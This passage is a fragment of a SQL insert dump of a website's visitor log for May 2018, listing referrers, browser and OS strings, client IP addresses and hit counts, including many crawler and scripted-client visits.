,'Macintosh','5.1','','208.80.194.29','000',1,0),(30753,'2018-05-22','https://zphiblgz.org/service/zen/','AppleWebKit','Windows','534','','131.253.25.189','000',1,0),(30754,'2018-05-22','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30755,'2018-05-22','https://zphiblgz.org','Chrome','Windows','50.0.2661.75','','133.242.22.177','000',1,0),(30756,'2018-05-22','zphiblgz.org','Chrome','Windows','46.0.2754.75','','92.222.29.57','000',1,0),(30757,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','204.93.177.191','000',1,0),(30758,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','162.248.245.163','000',1,0),(30759,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','46.163.70.228','000',1,0),(30760,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','188.116.33.163','000',1,0),(30761,'2018-05-22','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.228','000',2,0),(30762,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','37.59.108.85','000',1,0),(30763,'2018-05-22','https://zphiblgz.org','MSIE','Windows','8.0','','64.74.215.85','000',1,0),(30764,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.237.218','000',4,0),(30765,'2018-05-23','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.131.56.97','000',12,0),(30766,'2018-05-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.131.56.97','000',1,0),(30767,'2018-05-23','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(30768,'2018-05-23','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(30769,'2018-05-23','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.153','000',2,0),(30770,'2018-05-23','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(30771,'2018-05-23','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',2,0),(30772,'2018-05-23','http://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','188.165.229.75','000',3,0),(30773,'2018-05-23','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(30774,'2018-05-23','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(30775,'2018-05-23','https://www.bing.com/','MSIE','Windows','11.0','','170.211.184.55','000',2,0),(30776,'2018-05-23','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(30777,'2018-05-23','https://zphiblgz.org','Firefox','Windows','40.1','','197.48.241.198','000',2,0),(30778,'2018-05-23','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(30779,'2018-05-23','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(30780,'2018-05-23','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(30781,'2018-05-23','https://zphiblgz.org','Chrome','Windows','65.0.3325.162','','52.165.148.51','000',2,0),(30782,'2018-05-23','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',1,0),(30783,'2018-05-23','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.35','000',2,0),(30784,'2018-05-23','https://zphiblgz.org','Microsoft','Unknown','Unknown','','92.53.28.181','000',1,0),(30785,'2018-05-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','61.154.29.107','000',2,0),(30786,'2018-05-23','https://zphiblgz.org','MSIE','Windows','10.0','','217.64.127.166','000',1,0),(30787,'2018-05-23','https://www.google.com/','Chrome','Windows','66.0.3359.139','','65.83.119.254','000',2,0),(30788,'2018-05-23','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30789,'2018-05-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','103.39.240.239','000',4,0),(30790,'2018-05-23','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.173.241.248','000',1,0),(30791,'2018-05-23','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.2.211.92','000',1,0),(30792,'2018-05-23','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',2,0),(30793,'2018-05-23','zphiblgz.org','Chrome','Windows','58.0.1145.75','','128.199.157.152','000',1,0),(30794,'2018-05-23','zphiblgz.org','Chrome','Windows','46.0.2754.75','','132.255.220.2','000',2,0),(30795,'2018-05-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(30796,'2018-05-23','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(30797,'2018-05-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','95.216.145.173','000',2,0),(30798,'2018-05-23','https://zphiblgz.org/history/','AppleWebKit','Windows','534','','199.30.24.188','000',1,0),(30799,'2018-05-23','https://zphiblgz.org','Firefox','Windows','55.0','','109.254.254.111','000',1,0),(30800,'2018-05-23','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.30','000',1,0),(30801,'2018-05-23','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30802,'2018-05-23','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(30803,'2018-05-23','https://zphiblgz.org','Go--client','Unknown','1.1','','134.255.228.239','000',1,0),(30804,'2018-05-23','http://zphiblgz.org','Go--client','Unknown','2.0','','134.255.228.239','000',1,0),(30805,'2018-05-23','https://zphiblgz.org','Firefox','Windows','40.1','','177.35.69.31','000',2,0),(30806,'2018-05-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(30807,'2018-05-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.10.69','000',1,0),(30808,'2018-05-23','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(30809,'2018-05-23','https://www.google.com/','Chrome','Android','66.0.3359.158','','96.244.220.49','000',5,0),(30810,'2018-05-23','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','5.62.47.245','000',5,0),(30811,'2018-05-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','5.62.47.245','000',4,0),(30812,'2018-05-23','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(30813,'2018-05-23','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',1,0),(30814,'2018-05-24','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(30815,'2018-05-24','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(30816,'2018-05-24','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',1,0),(30817,'2018-05-24','https://zphiblgz.org/','Firefox','Windows','52.0','','137.74.132.80','000',2,0),(30818,'2018-05-24','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.75.43','000',2,0),(30819,'2018-05-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.12','000',1,0),(30820,'2018-05-24','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(30821,'2018-05-24','https://zphiblgz.org','Firefox','Windows','40.1','','120.29.65.216','000',2,0),(30822,'2018-05-24','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(30823,'2018-05-24','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(30824,'2018-05-24','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.96.247','000',3,0),(30825,'2018-05-24','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.201','000',1,0),(30826,'2018-05-24','https://zphiblgz.org','Firefox','Windows','40.1','','165.16.77.154','000',1,0),(30827,'2018-05-24','https://zphiblgz.org','Firefox','Windows','40.1','','41.208.111.227','000',1,0),(30828,'2018-05-24','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.14','000',1,0),(30829,'2018-05-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.90','000',2,0),(30830,'2018-05-24','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.166','000',1,0),(30831,'2018-05-24','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.172','000',1,0),(30832,'2018-05-24','https://zphiblgz.org','Firefox','Windows','40.1','','112.202.172.201','000',2,0),(30833,'2018-05-24','https://zphiblgz.org','MSIE','Windows','10.0','','5.9.94.207','000',1,0),(30834,'2018-05-24','https://zphiblgz.org','Firefox','Macintosh','57.0','','144.76.168.111','000',1,0),(30835,'2018-05-24','https://zphiblgz.org','Firefox','Windows','52.0','','5.9.94.207','000',1,0),(30836,'2018-05-24','https://www.google.com.ph/','Chrome','Windows','66.0.3359.139','','116.50.172.232','000',3,0),(30837,'2018-05-24','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(30838,'2018-05-24','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(30839,'2018-05-24','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(30840,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.186.217','000',2,0),(30841,'2018-05-24','https://zphiblgz.org','Firefox','Windows','45.0','','185.213.210.128','000',2,0),(30842,'2018-05-24','https://zphiblgz.org','Python-urllib','Unknown','2.7','','104.168.151.28','000',1,0),(30843,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.59','000',1,0),(30844,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.133','000',2,0),(30845,'2018-05-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.79.171.34','000',2,0),(30846,'2018-05-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(30847,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.20','000',2,0),(30848,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.190.186','000',2,0),(30849,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.196','000',2,0),(30850,'2018-05-24','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.180.82','000',2,0),(30851,'2018-05-24','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(30852,'2018-05-24','https://zphiblgz.org/ts_teams/nathalia-drew/','Safari','iPhone','7.0','','40.77.190.170','000',1,0),(30853,'2018-05-24','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(30854,'2018-05-24','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.155.138','000',2,0),(30855,'2018-05-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(30856,'2018-05-24','https://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',1,0),(30857,'2018-05-24','https://zphiblgz.org','Firefox','Windows','40.1','','105.155.66.146','000',2,0),(30858,'2018-05-24','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(30859,'2018-05-24','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(30860,'2018-05-24','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.183.226','000',2,0),(30861,'2018-05-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.35.38.13','000',1,0),(30862,'2018-05-24','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(30863,'2018-05-24','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(30864,'2018-05-24','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(30865,'2018-05-24','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(30866,'2018-05-24','http://www.google.com/','Chrome','Android','66.0.3359.158','','96.244.220.49','000',4,0),(30867,'2018-05-24','https://www.google.com/','Chrome','Macintosh','66.0.3359.139','','50.244.41.217','000',4,0),(30868,'2018-05-24','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','178.237.38.46','000',2,0),(30869,'2018-05-25','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(30870,'2018-05-25','https://zphiblgz.org','Chrome','Linux','56.0.2947.74','','23.94.47.126','000',1,0),(30871,'2018-05-25','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.168.254','000',2,0),(30872,'2018-05-25','https://zphiblgz.org','Safari','Macintosh','5.1','','208.87.233.140','000',1,0),(30873,'2018-05-25','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.138','000',1,0),(30874,'2018-05-25','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.107','000',1,0),(30875,'2018-05-25','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.102','000',1,0),(30876,'2018-05-25','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.87.233.140','000',1,0),(30877,'2018-05-25','https://zphiblgz.org','MSIE','Windows','8.0','','18.237.58.78','000',1,0),(30878,'2018-05-25','https://zphiblgz.org','MSIE','Windows','8.0','','34.216.180.125','000',1,0),(30879,'2018-05-25','https://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(30880,'2018-05-25','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(30881,'2018-05-25','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',4,0),(30882,'2018-05-25','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',4,0),(30883,'2018-05-25','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.139','000',2,0),(30884,'2018-05-25','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.18','000',1,0),(30885,'2018-05-25','https://zphiblgz.org/history/','AppleWebKit','Windows','534','','40.77.178.72','000',1,0),(30886,'2018-05-25','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.3.255','000',12,0),(30887,'2018-05-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.3.255','000',1,0),(30888,'2018-05-25','https://zphiblgz.org','Firefox','Windows','32.0','','188.165.244.171','000',1,0),(30889,'2018-05-25','https://zphiblgz.org','Python-urllib','Unknown','2.7','','118.219.252.196','000',1,0),(30890,'2018-05-25','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(30891,'2018-05-25','https://zphiblgz.org','Python-urllib','Unknown','2.7','','118.219.252.193','000',1,0),(30892,'2018-05-25','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.96.143','000',3,0),(30893,'2018-05-25','https://zphiblgz.org','Firefox','Windows','40.1','','49.230.214.188','000',2,0),(30894,'2018-05-25','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(30895,'2018-05-25','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(30896,'2018-05-25','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(30897,'2018-05-25','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(30898,'2018-05-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.229.99.117','000',4,0),(30899,'2018-05-25','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(30900,'2018-05-25','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(30901,'2018-05-25','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(30902,'2018-05-25','https://zphiblgz.org','Firefox','Windows','59.0','','54.166.83.52','000',4,0),(30903,'2018-05-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.35.38.124','000',2,0),(30904,'2018-05-25','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.30','000',1,0),(30905,'2018-05-25','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(30906,'2018-05-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',2,0),(30907,'2018-05-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',1,0),(30908,'2018-05-25','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(30909,'2018-05-25','https://zphiblgz.org','Firefox','Windows','40.1','','105.110.245.15','000',2,0),(30910,'2018-05-25','https://www.google.com/','Chrome','Windows','66.0.3359.181','','167.102.191.18','000',11,0),(30911,'2018-05-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',6,0),(30912,'2018-05-25','https://www.google.com/','Chrome','Windows','66.0.3359.181','','99.46.10.55','000',4,0),(30913,'2018-05-25','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.98','000',1,0),(30914,'2018-05-25','https://zphiblgz.org','Firefox','Windows','22.0','','212.35.191.222','000',2,0),(30915,'2018-05-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30916,'2018-05-25','https://zphiblgz.org','Firefox','Windows','59.0','','34.210.171.2','000',13,0),(30917,'2018-05-25','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(30918,'2018-05-25','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(30919,'2018-05-25','https://zphiblgz.org','curl','Unknown','7.35.0','','52.58.51.176','000',2,0),(30920,'2018-05-25','https://www.google.com/','Safari','iPhone','11.0','','59.12.128.236','000',3,0),(30921,'2018-05-25','https://zphiblgz.org','curl','Unknown','7.35.0','','89.137.191.22','000',2,0),(30922,'2018-05-25','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(30923,'2018-05-25','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','163.172.4.153','000',1,0),(30924,'2018-05-25','https://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(30925,'2018-05-26','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.124.14','000',2,0),(30926,'2018-05-26','https://zphiblgz.org','Firefox','Windows','40.1','','202.86.119.72','000',2,0),(30927,'2018-05-26','https://zphiblgz.org','Go--client','Unknown','1.1','','89.109.57.106','000',2,0),(30928,'2018-05-26','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',2,0),(30929,'2018-05-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(30930,'2018-05-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(30931,'2018-05-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.35.38.124','000',2,0),(30932,'2018-05-26','https://zphiblgz.org','MSIE','Windows','11.0','','62.67.194.35','000',1,0),(30933,'2018-05-26','https://zphiblgz.org','MSIE','Windows','11.0','','195.214.79.20','000',1,0),(30934,'2018-05-26','https://zphiblgz.org','Firefox','Windows','40.1','','183.82.39.131','000',2,0),(30935,'2018-05-26','https://zphiblgz.org','Chrome','Windows','43.0.2357.134','','78.46.90.120','000',1,0),(30936,'2018-05-26','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.34','000',1,0),(30937,'2018-05-26','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','96.127.158.234','000',1,0),(30938,'2018-05-26','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(30939,'2018-05-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(30940,'2018-05-26','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(30941,'2018-05-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(30942,'2018-05-26','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(30943,'2018-05-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',1,0),(30944,'2018-05-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(30945,'2018-05-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',1,0),(30946,'2018-05-26','https://www.google.com/','Chrome','Windows','66.0.3359.181','','96.244.131.88','000',8,0),(30947,'2018-05-26','https://zphiblgz.org/','AppleWebKit','Windows','534','','40.77.190.245','000',1,0),(30948,'2018-05-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(30949,'2018-05-27','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.68.238','000',2,0),(30950,'2018-05-27','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','96.244.131.88','000',42,0),(30951,'2018-05-27','https://zphiblgz.org','Safari','iPhone','10.0','','69.137.152.142','000',3,0),(30952,'2018-05-27','http://zphiblgz.org/jeffs_simple_cms/media_uploader/server/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(30953,'2018-05-27','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(30954,'2018-05-27','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(30955,'2018-05-27','https://zphiblgz.org','MSIE','Windows','8.0','','159.89.172.54','000',2,0),(30956,'2018-05-27','https://zphiblgz.org','Chrome','Chrome OS','27.0.1453.116','','159.89.172.54','000',1,0),(30957,'2018-05-27','https://zphiblgz.org','Chrome','Windows','32.0.1667.0','','159.89.172.54','000',2,0),(30958,'2018-05-27','https://zphiblgz.org','Chrome','Windows','41.0.2226.0','','159.89.172.54','000',2,0),(30959,'2018-05-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(30960,'2018-05-27','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(30961,'2018-05-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',4,0),(30962,'2018-05-27','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(30963,'2018-05-27','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.35','000',1,0),(30964,'2018-05-27','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(30965,'2018-05-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(30966,'2018-05-27','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(30967,'2018-05-27','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.133.155','000',1,0),(30968,'2018-05-27','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','198.143.133.154','000',1,0),(30969,'2018-05-27','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30970,'2018-05-27','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(30971,'2018-05-27','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(30972,'2018-05-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(30973,'2018-05-27','https://zphiblgz.org','MSIE','Windows','8.0','','70.42.131.170','000',4,0),(30974,'2018-05-27','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30975,'2018-05-27','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.35.135','000',2,0),(30976,'2018-05-27','https://zphiblgz.org','Firefox','Macintosh','3.6.2','','192.99.4.98','000',2,0),(30977,'2018-05-27','https://zphiblgz.org','Firefox','Linux','53.0','','192.99.4.98','000',2,0),(30978,'2018-05-27','https://zphiblgz.org','Chrome','Windows','41.0.2224.3','','216.169.108.195','000',2,0),(30979,'2018-05-27','https://zphiblgz.org/scholarship/soror-conway1/','AppleWebKit','Windows','534','','40.77.190.197','000',1,0),(30980,'2018-05-28','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','138.68.184.158','000',2,0),(30981,'2018-05-28','https://zphiblgz.org','MSIE','Windows','10.0','','5.9.106.81','000',1,0),(30982,'2018-05-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(30983,'2018-05-28','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(30984,'2018-05-28','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(30985,'2018-05-28','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.67','000',1,0),(30986,'2018-05-28','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.117','000',2,0),(30987,'2018-05-28','https://zphiblgz.org','Firefox','Windows','40.0','','178.136.239.45','000',1,0),(30988,'2018-05-28','https://zphiblgz.org','MSIE','Windows','8.0','','34.212.172.251','000',1,0),(30989,'2018-05-28','https://www.google.com/','Safari','iPhone','11.0','','73.131.19.52','000',2,0),(30990,'2018-05-28','https://zphiblgz.org','Firefox','Windows','40.1','','213.16.57.175','000',2,0),(30991,'2018-05-28','https://zphiblgz.org','Firefox','Windows','40.1','','41.228.11.202','000',2,0),(30992,'2018-05-28','https://zphiblgz.org','Firefox','Windows','57.0','','107.172.71.113','000',2,0),(30993,'2018-05-28','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',2,0),(30994,'2018-05-28','https://zphiblgz.org','MSIE','Windows','8.0','','35.162.175.82','000',1,0),(30995,'2018-05-28','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.201','000',1,0),(30996,'2018-05-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(30997,'2018-05-28','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(30998,'2018-05-28','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.190','000',1,0),(30999,'2018-05-28','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.82','000',1,0),(31000,'2018-05-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',1,0),(31001,'2018-05-28','https://www.google.com/','Chrome','Windows','66.0.3359.181','','50.89.216.10','000',2,0),(31002,'2018-05-28','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','138.68.180.18','000',2,0),(31003,'2018-05-28','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.209','000',1,0),(31004,'2018-05-28','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(31005,'2018-05-28','https://www.google.com/','Chrome','Android','64.0.3282.137','','68.33.71.184','000',2,0),(31006,'2018-05-28','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(31007,'2018-05-28','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(31008,'2018-05-28','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(31009,'2018-05-28','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(31010,'2018-05-28','https://zphiblgz.org','Chrome','Windows','51.0.2704.103','','195.211.23.206','000',1,0),(31011,'2018-05-28','https://zphiblgz.org','Firefox','Windows','40.1','','103.111.225.2','000',2,0),(31012,'2018-05-29','https://zphiblgz.org','Go--client','Unknown','1.1','','173.212.228.153','000',1,0),(31013,'2018-05-29','http://zphiblgz.org','Go--client','Unknown','2.0','','173.212.228.153','000',1,0),(31014,'2018-05-29','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.41','000',2,0),(31015,'2018-05-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.70','000',1,0),(31016,'2018-05-29','http://www.google.com','Chrome','Windows','58.0.3029.81','','87.98.227.4','000',3,0),(31017,'2018-05-29','https://zphiblgz.org','Firefox','Windows','40.1','','60.53.10.116','000',2,0),(31018,'2018-05-29','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(31019,'2018-05-29','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',2,0),(31020,'2018-05-29','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.9.147','000',1,0),(31021,'2018-05-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.110.180','000',4,0),(31022,'2018-05-29','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.11.204','000',12,0),(31023,'2018-05-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.11.204','000',1,0),(31024,'2018-05-29','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','45.55.252.30','000',12,0),(31025,'2018-05-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','45.55.252.30','000',1,0),(31026,'2018-05-29','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(31027,'2018-05-29','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(31028,'2018-05-29','https://zphiblgz.org','Firefox','Windows','40.1','','186.232.233.100','000',2,0),(31029,'2018-05-29','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','195.154.59.173','000',1,0),(31030,'